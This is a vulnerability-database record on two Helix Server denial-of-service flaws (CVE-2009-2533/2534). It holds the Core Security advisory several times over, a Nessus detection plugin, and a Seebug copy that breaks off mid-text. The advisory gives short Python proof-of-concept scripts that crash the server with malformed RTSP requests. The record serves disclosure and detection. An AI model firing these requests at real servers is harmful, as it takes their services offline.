{"cve": [{"lastseen": "2018-10-11T11:33:53", "bulletinFamily": "NVD", "description": "rmserver in RealNetworks Helix Server and Helix Mobile Server before 13.0.0 allows remote attackers to cause a denial of service (daemon exit) via multiple RTSP SET_PARAMETER requests with empty DataConvertBuffer headers.", "modified": "2018-10-10T15:40:33", "published": "2009-07-20T13:30:54", "id": "CVE-2009-2533", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2533", "title": "CVE-2009-2533", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-11T11:33:53", "bulletinFamily": "NVD", "description": "RealNetworks Helix Server and Helix Mobile Server before 13.0.0 allow remote attackers to cause a denial of service (daemon crash) via an RTSP SETUP request that (1) specifies the / URI or (2) lacks a / character in the URI.", "modified": "2018-10-10T15:40:34", "published": "2009-07-20T13:30:57", "id": "CVE-2009-2534", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2534", "title": "CVE-2009-2534", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T10:05:10", "bulletinFamily": "exploit", "description": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities. CVE-2009-2533,CVE-2009-2534. Dos exploits for multiple platform", "modified": "2009-07-17T00:00:00", "published": "2009-07-17T00:00:00", "id": "EDB-ID:9198", "href": "https://www.exploit-db.com/exploits/9198/", "type": "exploitdb", "title": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\nAdvisory ID: CORE-2009-0227\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\nDate published: 2009-07-17\nDate of last update: 2009-07-17\nVendors contacted: RealNetworks\nRelease mode: Forced release\n\n\n2. *Vulnerability Information*\n\nClass: Denial of service (DoS)\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: N/A\nCVE Name: CVE-2009-2533, CVE-2009-2534\n\n\n3. *Vulnerability Description*\n\nHelix Server is a multi-format cross-platform streaming server. Two\nvulnerabilities have been found, that could allow a remote attacker to\ncrash the Helix Server.\n\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\n'DataConvertBuffer' parameter is received by the server, it will raise\nan exception reading an invalid direction of memory. This exception is\nusually handled correctly but if you send this malformed request\nmultiple times in a short period of time, it could render the Helix\nServer unresponsive and terminate its execution.\n\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\nrequest line, if this byte is absent the process crashes with an access\nviolation.\n\n\n4. *Vulnerable packages*\n\n . Helix Server Version 12.x\n . Helix Mobile Server Version 12.x\n . The vulnerabilities were investigated on Helix Server Version\n12.0.1.215 (Tahiti) Build 175002/12667\n\n\n5. *Non-vulnerable packages*\n\n . Helix Server Version 13.0.0\n . Helix Mobile Server Version 13.0.0\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nAccording to the Security Update 071409HS [2] published by RealNetworks:\n\"The vulnerability is resolved on the following platforms by installing\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\nonly pertains to supported versions of the platforms listed below. The\nupdated version will be available on your RealNetworks PAM site after\n12:00 am PST, on July 14, 2009.\"\n\n . Red Hat Enterprise Linux 4\n . Red Hat Enterprise Linux 5\n . Sun Solaris 10\n . Windows 2003\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Damian Frizza\nfrom Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*\n\nThe problem arises when the 'rmserver' process receives an 'RTSP\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\nparameter. The handling code reads at the memory location zero (0) and\ntriggers an exception, which is handled correctly. However sending this\nmalformed request multiple times renders the rmserver process\nunresponsive and subsequently stops its execution.\n\nThe code section which triggers the exception is:\n\n/-----------\n\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\n*Sets the content of the local variable to 0\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\n0045806F |. 50 PUSH EAX\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\nTries to read form 0 memory location\n\n- -----------/\n\n The following PoC code reproduces the issue:\n\n/-----------\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('172.16.132.133',554))\n\nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\"\nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\"\n\nfor i in range(5):\n print i\n s.send(setRequest)\n\ns.close()\n\n- -----------/\n\n\n\nThe following output is written in the log file:\n\n/-----------\n\n4068: FATAL ERROR: The server has run out of memory!\nFATAL ERROR: Last request was rounded up to 1155072 bytes\nTrace:\n0x00409C96\n...\n...\n...\n0x00000000\nFATAL ERROR: Server Terminated\n\n- -----------/\n\n\n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\n\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\nis absent in the request line. While handling this kind of malformed\nrequest the server crashes with an access violation.\n\nThe code section which triggers the access violation is:\n\n/-----------\n\n0047A490 |. 6A 2F PUSH 2F\n0047A492 |. 56 PUSH ESI\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\n ; MSVCR71.strchr\n\n- -----------/\n\n if only the \"/\" (0x2F) character is sent, the program tries to copy\nfrom 0 and the access violation exception is raised.\n\n/-----------\n\n0047A490 |. 6A 2F PUSH 2F\n0047A492 |. 56 PUSH ESI\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\n ; MSVCR71.strchr\n\n- -----------/\n\n The following code reproduces the issue:\n\n/-----------\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('172.16.132.133',554))\n\nsetRequest = \"SETUP / RTSP/1.0\\r\\n\\r\\n\"\n\ns.send(setRequest)\ns.close()\n\n- -----------/\n\n\n9. *Report Timeline*\n\n. 2009-03-04:\nCore Security Technologies notifies RealNetworks of the vulnerability.\nCore initially schedules publication of its advisory to April 6th, 2009.\n\n. 2009-03-16:\nCore notifies again RealNetworks of the vulnerability.\n\n. 2009-03-16:\nRealNetworks identifies the vulnerability alert as SPAM.\n\n. 2009-03-20:\nThe RealNetworks team asks Core for a technical description of the\nvulnerability.\n\n. 2009-03-23:\nTechnical details sent to RealNetworks team by Core. RealNetworks\nacknowledges reception.\n\n. 2009-03-30:\nCore requests information about the plans of RealNetworks to fix the\nvulnerabilities.\n\n. 2009-03-30:\nRealNetworks responds that fixes will be included in the next public\nrelease - currently targeted for July 2009.\n\n. 2009-05-04:\nCore requests RealNetworks a technical analysis of the vulnerabilities,\na list of the affected versions of Helix Server, and a detailed timeline\nfor developing, testing and releasing fixes for these vulnerabilities.\nIt is only based on that information that Core can reevaluate its\nadvisory publication timeframe (which was originally scheduled to be\npublished on April 6).\n\n. 2009-05-05:\nRealNetworks responds that fixes will be available in mid-2009, most\nlikely in the July time frame, and that to protect its customer base\nRealNetworks will not provide additional details until the release is\npublicly available.\n\n. 2009-05-05:\nCore requests a more precise estimation for the release of fixes (no\nreply received).\n\n. 2009-05-29:\nCore requests again RealNetworks an estimated date for the release of\nfixes, and technical details about the issues. In the meantime, the\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\nreply received).\n\n. 2009-07-16:\nAn updated version of the advisory was sent to RealNetworks by Core.\nCore requests again information about this issue.\n\n. 2009-07-17:\nCore is made aware that Real Networks has released the Security Update\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\nServer and the Helix Mobile Server have been updated to ensure that the\nabove vulnerabilities have been resolved.\n\n. 2009-07-17:\nThe advisory CORE-2009-0227 is published by Core.\n\n\n\n10. *References*\n\n[1] RealNetworks\nhttp://www.realnetworks.com/\n[2] RealNetworks Security Update 071409HS\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.8 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\n=9iPO\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-17]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9198/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\r\nAdvisory ID: CORE-2009-0227\r\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\r\nDate published: 2009-07-17\r\nDate of last update: 2009-07-17\r\nVendors contacted: RealNetworks\r\nRelease mode: Forced release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service (DoS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: N/A\r\nCVE Name: CVE-2009-2533, CVE-2009-2534\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHelix Server is a multi-format cross-platform streaming server. Two\r\nvulnerabilities have been found, that could allow a remote attacker to\r\ncrash the Helix Server.\r\n\r\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\r\n'DataConvertBuffer' parameter is received by the server, it will raise\r\nan exception reading an invalid direction of memory. This exception is\r\nusually handled correctly but if you send this malformed request\r\nmultiple times in a short period of time, it could render the Helix\r\nServer unresponsive and terminate its execution.\r\n\r\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\r\nrequest line, if this byte is absent the process crashes with an access\r\nviolation.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Helix Server Version 12.x\r\n . Helix Mobile Server Version 12.x\r\n . The vulnerabilities were investigated on Helix Server Version\r\n12.0.1.215 (Tahiti) Build 175002/12667\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Helix Server Version 13.0.0\r\n . Helix Mobile Server Version 13.0.0\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nAccording to the Security Update 071409HS [2] published by RealNetworks:\r\n"The vulnerability is resolved on the following platforms by installing\r\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\r\nonly pertains to supported versions of the platforms listed below. The\r\nupdated version will be available on your RealNetworks PAM site after\r\n12:00 am PST, on July 14, 2009."\r\n\r\n . Red Hat Enterprise Linux 4\r\n . Red Hat Enterprise Linux 5\r\n . Sun Solaris 10\r\n . Windows 2003\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Damian Frizza\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*\r\n\r\nThe problem arises when the 'rmserver' process receives an 'RTSP\r\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\r\nparameter. The handling code reads at the memory location zero (0) and\r\ntriggers an exception, which is handled correctly. However sending this\r\nmalformed request multiple times renders the rmserver process\r\nunresponsive and subsequently stops its execution.\r\n\r\nThe code section which triggers the exception is:\r\n\r\n/-----------\r\n\r\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\r\n*Sets the content of the local variable to 0\r\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n0045806F |. 50 PUSH EAX\r\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\r\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\r\nTries to read form 0 memory location\r\n\r\n- -----------/\r\n\r\n The following PoC code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = "SET_PARAMETER / RTSP/1.0\r\n"\r\nsetRequest +="DataConvertBuffer: \r\n\r\n"\r\n\r\nfor i in range(5):\r\n print i\r\n s.send(setRequest)\r\n\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe following output is written in the log file:\r\n\r\n/-----------\r\n\r\n4068: FATAL ERROR: The server has run out of memory!\r\nFATAL ERROR: Last request was rounded up to 1155072 bytes\r\nTrace:\r\n0x00409C96\r\n...\r\n...\r\n...\r\n0x00000000\r\nFATAL ERROR: Server Terminated\r\n\r\n- -----------/\r\n\r\n\r\n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\r\n\r\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\r\nis absent in the request line. While handling this kind of malformed\r\nrequest the server crashes with an access violation.\r\n\r\nThe code section which triggers the access violation is:\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n if only the "/" (0x2F) character is sent, the program tries to copy\r\nfrom 0 and the access violation exception is raised.\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n The following code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = "SETUP / RTSP/1.0\r\n\r\n"\r\n\r\ns.send(setRequest)\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-03-04:\r\nCore Security Technologies notifies RealNetworks of the vulnerability.\r\nCore initially schedules publication of its advisory to April 6th, 2009.\r\n\r\n. 2009-03-16:\r\nCore notifies again RealNetworks of the vulnerability.\r\n\r\n. 2009-03-16:\r\nRealNetworks identifies the vulnerability alert as SPAM.\r\n\r\n. 2009-03-20:\r\nThe RealNetworks team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2009-03-23:\r\nTechnical details sent to RealNetworks team by Core. RealNetworks\r\nacknowledges reception.\r\n\r\n. 2009-03-30:\r\nCore requests information about the plans of RealNetworks to fix the\r\nvulnerabilities.\r\n\r\n. 2009-03-30:\r\nRealNetworks responds that fixes will be included in the next public\r\nrelease - currently targeted for July 2009.\r\n\r\n. 2009-05-04:\r\nCore requests RealNetworks a technical analysis of the vulnerabilities,\r\na list of the affected versions of Helix Server, and a detailed timeline\r\nfor developing, testing and releasing fixes for these vulnerabilities.\r\nIt is only based on that information that Core can reevaluate its\r\nadvisory publication timeframe (which was originally scheduled to be\r\npublished on April 6).\r\n\r\n. 2009-05-05:\r\nRealNetworks responds that fixes will be available in mid-2009, most\r\nlikely in the July time frame, and that to protect its customer base\r\nRealNetworks will not provide additional details until the release is\r\npublicly available.\r\n\r\n. 2009-05-05:\r\nCore requests a more precise estimation for the release of fixes (no\r\nreply received).\r\n\r\n. 2009-05-29:\r\nCore requests again RealNetworks an estimated date for the release of\r\nfixes, and technical details about the issues. In the meantime, the\r\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\r\nreply received).\r\n\r\n. 2009-07-16:\r\nAn updated version of the advisory was sent to RealNetworks by Core.\r\nCore requests again information about this issue.\r\n\r\n. 2009-07-17:\r\nCore is made aware that Real Networks has released the Security Update\r\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\r\nServer and the Helix Mobile Server have been updated to ensure that the\r\nabove vulnerabilities have been resolved.\r\n\r\n. 2009-07-17:\r\nThe advisory CORE-2009-0227 is published by Core.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] RealNetworks\r\nhttp://www.realnetworks.com/\r\n[2] RealNetworks Security Update 071409HS\r\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\r\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\r\n=9iPO\r\n-----END PGP SIGNATURE-----", "modified": "2009-07-20T00:00:00", "published": "2009-07-20T00:00:00", "id": "SECURITYVULNS:DOC:22192", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22192", "title": "CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:09:36", "bulletinFamily": "scanner", "description": "According to its banner, The remote host is running version 12.x of\nRealNetworks Helix Server / Helix Mobile Server. Such versions are\nreportedly affected by multiple issues :\n\n - By sending a specially crafted 'RTSP' (SET_PARAMETERS) \n request with a 'DataConvertBuffer' parameter and either\n no 'Content-Length' header or an invalid 'Content-Length'\n header, an attacker may be able to crash the remote Helix \n server process. (CVE-2009-2533)\n\n - By sending a 'SETUP' request without including a '/' \n character in it, a remote attacker may be able to crash\n the remote Helix server process. (CVE-2009-2534)", "modified": "2018-11-15T00:00:00", "published": "2009-07-21T00:00:00", "id": "HELIX_SVR_13_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40350", "title": "RealNetworks Helix Server < 13.0.0 Multiple Remote DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40350);\n script_version (\"1.9\");\n\n script_cve_id(\"CVE-2009-2533\", \"CVE-2009-2534\");\n script_bugtraq_id(35731, 35732);\n script_xref(name:\"Secunia\", value:\"35815\");\n \n script_name(english:\"RealNetworks Helix Server < 13.0.0 Multiple Remote DoS\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote media streaming server is affected by multiple denial of\nservice vulnerabilities.\" );\n\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, The remote host is running version 12.x of\nRealNetworks Helix Server / Helix Mobile Server. Such versions are\nreportedly affected by multiple issues :\n\n - By sending a specially crafted 'RTSP' (SET_PARAMETERS) \n request with a 'DataConvertBuffer' parameter and either\n no 'Content-Length' header or an invalid 'Content-Length'\n header, an attacker may be able to crash the remote Helix \n server process. (CVE-2009-2533)\n\n - By sending a 'SETUP' request without including a '/' \n character in it, a remote attacker may be able to crash\n the remote Helix server process. (CVE-2009-2534)\" );\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.coresecurity.com/content/real-helix-dna\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2009/Jul/121\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\" );\n\n script_set_attribute(attribute:\"solution\", value:\n\"Update to RealNetworks Helix Server / Helix Mobile Server 13.0.0 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n \n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Checks version in banner.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n script_dependencies(\"rtsp_detect.nasl\");\n script_require_ports(\"Services/rtsp\", 554);\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\nport = get_kb_item(\"Services/rtsp\");\nif ( ! port ) port = 554;\n\nif (!get_port_state(port)) exit(0);\n\nserv = get_kb_item(string(\"rtsp/server/\",port));\n\nif (!serv || !ereg(pattern:\"Helix (Mobile|) *Server Version\",string:serv)) \n exit(0,\"Banner not from Helix Server or Helix Mobile Server.\");\n\n# Versions 12.x are affected \n\nif (ereg(pattern:\"Version 12\", string:serv)) \n{\n if (report_verbosity > 0)\n { \n report = string(\n '\\n',\n 'The remote Helix server responded with the following banner :\\n',\n '\\n',\n ' ', serv,'\\n'\n );\n security_warning(port:port,extra:report);\n }\n else security_warning(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:43:28", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-07-18T00:00:00", "published": "2009-07-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11832", "id": "SSV:11832", "type": "seebug", "title": "Real Helix DNA RTSP and SETUP Request Handler Vulnerabilities", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nReal Helix DNA RTSP and SETUP request handler vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities\r\nAdvisory ID: CORE-2009-0227\r\nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna\r\nDate published: 2009-07-17\r\nDate of last update: 2009-07-17\r\nVendors contacted: RealNetworks\r\nRelease mode: Forced release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Denial of service (DoS)\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: N/A\r\nCVE Name: CVE-2009-2533, CVE-2009-2534\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHelix Server is a multi-format cross-platform streaming server. Two\r\nvulnerabilities have been found, that could allow a remote attacker to\r\ncrash the Helix Server.\r\n\r\nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty\r\n'DataConvertBuffer' parameter is received by the server, it will raise\r\nan exception reading an invalid direction of memory. This exception is\r\nusually handled correctly but if you send this malformed request\r\nmultiple times in a short period of time, it could render the Helix\r\nServer unresponsive and terminate its execution.\r\n\r\nDuring the 'SETUP' request handling, a 0x2F character is searched in the\r\nrequest line, if this byte is absent the process crashes with an access\r\nviolation.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Helix Server Version 12.x\r\n . Helix Mobile Server Version 12.x\r\n . The vulnerabilities were investigated on Helix Server Version\r\n12.0.1.215 (Tahiti) Build 175002/12667\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Helix Server Version 13.0.0\r\n . Helix Mobile Server Version 13.0.0\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nAccording to the Security Update 071409HS [2] published by RealNetworks:\r\n"The vulnerability is resolved on the following platforms by installing\r\nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This\r\nonly pertains to supported versions of the platforms listed below. The\r\nupdated version will be available on your RealNetworks PAM site after\r\n12:00 am PST, on July 14, 2009."\r\n\r\n . Red Hat Enterprise Linux 4\r\n . Red Hat Enterprise Linux 5\r\n . Sun Solaris 10\r\n . Windows 2003\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Damian Frizza\r\nfrom Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*\r\n\r\nThe problem arises when the 'rmserver' process receives an 'RTSP\r\n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer'\r\nparameter. The handling code reads at the memory location zero (0) and\r\ntriggers an exception, which is handled correctly. However sending this\r\nmalformed request multiple times renders the rmserver process\r\nunresponsive and subsequently stops its execution.\r\n\r\nThe code section which triggers the exception is:\r\n\r\n/-----------\r\n\r\n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0\r\n*Sets the content of the local variable to 0\r\n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n0045806F |. 50 PUSH EAX\r\n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C]\r\n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\r\n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] *\r\nTries to read form 0 memory location\r\n\r\n- -----------/\r\n\r\n The following PoC code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = "SET_PARAMETER / RTSP/1.0\\r\\n"\r\nsetRequest +="DataConvertBuffer: \\r\\n\\r\\n"\r\n\r\nfor i in range(5):\r\n print i\r\n s.send(setRequest)\r\n\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n\r\nThe following output is written in the log 